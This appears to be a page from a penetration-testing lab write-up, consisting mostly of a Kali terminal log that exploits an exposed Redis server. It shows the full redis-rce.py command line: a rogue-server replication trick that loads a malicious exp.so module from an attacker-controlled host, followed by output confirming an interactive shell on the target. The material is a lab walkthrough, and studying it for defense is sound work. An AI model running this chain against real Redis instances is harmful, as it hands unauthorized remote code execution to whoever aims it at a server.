Exploitation

╭─      /home/kali/BG/redis-rce     master ?1 ▓▒░────────────────────────────────────────────────░▒▓ ✔  15s    root@kali 
╰─ python3 redis-rce.py -r 192.168.242.176 -p 6379 -L 192.168.49.242 -P 6379 -f /home/kali/BG/redis-rce/redis-rogue-server/RedisModulesSDK/exp/exp.so

█▄▄▄▄ ▄███▄   ██▄   ▄█    ▄▄▄▄▄       █▄▄▄▄ ▄█▄    ▄███▄   
█  ▄▀ █▀   ▀  █  █  ██   █     ▀▄     █  ▄▀ █▀ ▀▄  █▀   ▀  
█▀▀▌  ██▄▄    █   █ ██ ▄  ▀▀▀▀▄       █▀▀▌  █   ▀  ██▄▄    
█  █  █▄   ▄▀ █  █  ▐█  ▀▄▄▄▄▀        █  █  █▄  ▄▀ █▄   ▄▀ 
  █   ▀███▀   ███▀   ▐                  █   ▀███▀  ▀███▀   
 ▀                                     ▀                   


[*] Connecting to  192.168.242.176:6379...
[*] Sending SLAVEOF command to server
[+] Accepted connection from 192.168.242.176:6379
[*] Setting filename
[+] Accepted connection from 192.168.242.176:6379
[*] Start listening on 192.168.49.242:6379
[*] Tring to run payload
[+] Accepted connection from 192.168.242.176:46704
[*] Closing rogue server...

[+] What do u want ? [i]nteractive shell or [r]everse shell or [e]xit: i
[+] Interactive shell open , use "exit" to exit...
$ ls
$ whoami
exp_lin.so
exp.so
snap.lxd
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-logind.service-D0hrMh
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-resolved.service-kR64tg
systemd-private-e28d10f1b9db42f4847a9d60b88d7429-systemd-timesyncd.service-i0lI9g
vmware-root_708-2998936538
$ nc
Aprudence
PreviousRedisNextPriv Escalation

Last updated